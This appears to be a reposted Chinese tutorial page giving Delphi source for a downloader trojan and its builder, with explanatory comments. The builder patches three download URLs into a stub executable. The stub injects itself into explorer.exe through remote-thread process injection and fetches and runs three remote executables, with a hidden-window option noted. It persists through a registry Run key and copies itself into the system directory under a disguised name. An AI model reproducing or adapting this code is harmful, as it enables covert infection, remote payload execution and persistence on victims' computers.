本文整理自网络,侵删。
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls; //调用的单元,
const
OFFSET_URL = 29548; //下载地址偏移 1
OFFSET_URL2 = 29616; //下载地址偏移 2
OFFSET_URL3 = 29684; //下载地址偏移 3
计算方法是用C32ASM打开编译得服务端即server.exe,搜索server中
var
url: pchar ='
url2: pchar ='
url3: pchar ='
三个变量得位置,搜索方法直接搜索一堆空格,就能找到,如果你怕找不好,可以把上面
pchar ='
里面换作pchar ='http://
搜索http://即可,搜索到位置后,转换成10进制写在类似29548等的位置}
type
TForm1 = class(TForm)
Label1: TLabel;
EdtUrl: TEdit;
Button1: TButton;
Button2: TButton;
Label3: TLabel;
Label4: TLabel;
Edit1: TEdit;
Label5: TLabel;
Edit2: TEdit;
Label2: TLabel;
Label7: TLabel;
procedure Button2Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{上面一堆代码是DELPHI自动添加的,Var 是定义全局变量的位置,需要加啥自己加,如果不想修改就那么放着好了}
procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;
//按钮button2按下关闭
procedure TForm1.Button1Click(Sender: TObject);
var
WriteBuff, ResultFilePath, ResourcePointer: PChar;
ResourceLocation: HRSRC;
Res, BytesWritten: Longword;
ResDataHandle: THandle;
FileHandle: THandle;
sf:TSaveDialog;
Url,Url2,Url3:string; //这儿是重点,必须定义,其他的不需要改动
begin
if trim(EdtUrl.Text)='' then
begin
Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation);
exit;
end;
//地址为空时提示
sf :=TSaveDialog.Create(Application);
sf.DefaultExt :='exe';
sf.Title :='生成';
if not sf.Execute then exit;
Url :=trim(EdtUrl.Text); //trim函数去掉空格,取得编辑框输入的内容
Url2 :=trim(Edit1.Text); //同上
Url3 :=trim(Edit2.Text); //同上
ResultFilePath := pchar(sf.FileName);
ResourceLocation := FindResource(HInstance, 'urlmm', RT_RCDATA); //用资源RCDATA中urlmm资源
if ResourceLocation <> 0 then
begin
Res := SizeofResource(HInstance, ResourceLocation);
if Res <> 0 then
begin
ResDataHandle := LoadResource(HInstance, ResourceLocation);
if ResDataHandle <> 0 then
begin
ResourcePointer := LockResource(ResDataHandle);
if ResourcePointer <> nil then
begin
FileHandle := CreateFile
(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, Create_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if FileHandle <> INVALID_HANDLE_VALUE then
begin
WriteFile(FileHandle, ResourcePointer^, Res, BytesWritten, nil);
Sleep(10);
//看好下面三段,写入偏移的重点,48是长度,49是中止长度,你空格多长,这里就多长
//三段写入了3个地址
SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);
WriteBuff := PChar(Url + StringOfChar(#0, 48 - Length(Url)));
WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
SetFilePointer(FileHandle, OFFSET_URL2, nil, FILE_BEGIN);
WriteBuff := PChar(Url2 + StringOfChar(#0, 48 - Length(Url2)));
WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
SetFilePointer(FileHandle, OFFSET_URL3, nil, FILE_BEGIN);
WriteBuff := PChar(Url3 + StringOfChar(#0, 48 - Length(Url3)));
WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
CloseHandle(FileHandle); //这个一定不能少
MessageBox(0, '配置文件成功', '提示', mb_iconinformation);
end;
end;
end;
end;
end;
end;
program server;
{$IMAGEBASE $13140000}usesWindows,SysUtils,urlmon, //下载单元 ,这个改api减少体积不多Registry; //注册表单元,这个可以改成api,会减少很多体积
var
url: pchar =' //依次3个留出了生成器写入下载地址的位置
url2: pchar ='
url3: pchar ='
procedure Download; //下载过程
begin
URLDownloadToFile(nil, url, 'C:\windows\temp\system.exe', 0, nil); //下载文件
WinExec('C:\windows\temp\system.exe', SW_SHOW); //SW_SHOW or SW_HIDE //执行文件 sw_show是显示运行,sw_hide是隐藏运行
URLDownloadToFile(nil, url2, 'C:\windows\temp\system2.exe', 0, nil);
WinExec('C:\windows\temp\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE //winexec可以用api写,减少体积
URLDownloadToFile(nil, url3, 'C:\windows\temp\system3.exe', 0, nil);
WinExec('C:\windows\temp\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE
end;
var
hModule, hModule_News: Pointer;
Extent, Size, ThreadId: longword;
ProcessHandle, Pid: longword;
reg:TRegistry;
sysdir:array[0..50] of char;
begin
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); //打开进程
hModule := Pointer(GetModuleHandle(nil));
//这里得到的值为一个返回一个指针型变量,指向内容包括自身映像的基址和长度
Extent := PImageOptionalHeader(Pointer(integer(hModule) + PImageDosHeader(hModule)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//得到内存映像的长度
VirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);
//在Exp进程的内存范围内分配一个足够长度的内存
hModule_News := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定起始基址和内存映像基址的位置
WriteProcessMemory(ProcessHandle, hModule_News, hModule, Extent, Size);
//确定上面各项数据后,这里开始进行操作
CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);
//建立远程线程,至此注入过程完成
CloseHandle(ProcessHandle);
//关闭对像
{上面这段代码是插进程explorer.exe}
begin
Reg := TRegistry.Create;
Try
Reg.RootKey := HKEY_LOCAL_MACHINE;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);
Reg.WriteString('system', 'intenat.exe'); //写入数据
Reg.CloseKey;
Finally
Reg.Free;
End;
//上面是写注册表代码
GetSystemDirectory(sysdir,50); //获取系统目录,赋给sysdir变量 ,getwindowsdirectory是获取windows目录
if not FileExists(sysdir+'\intenat.exe') then //如果系统目录下不存在intenat.exe则执行
copyfile(pchar(paramstr(0)),pchar(sysdir+'\intenat.exe'),true); //复制自身到系统目录下,名字是intenat.exe
end;
end.
end.
相关阅读 >>
Delphi 莫名奇妙的错误 Delphi is not a valid integer value
Delphi xe5 android 使用system.zip单元释放资源文件
Delphi xe5实现datetimetounix/unixtodatetime的一点小改进
Delphi xe5 将Delphi code从winos 迁移到ios与android
更多相关阅读请进入《Delphi》频道 >>
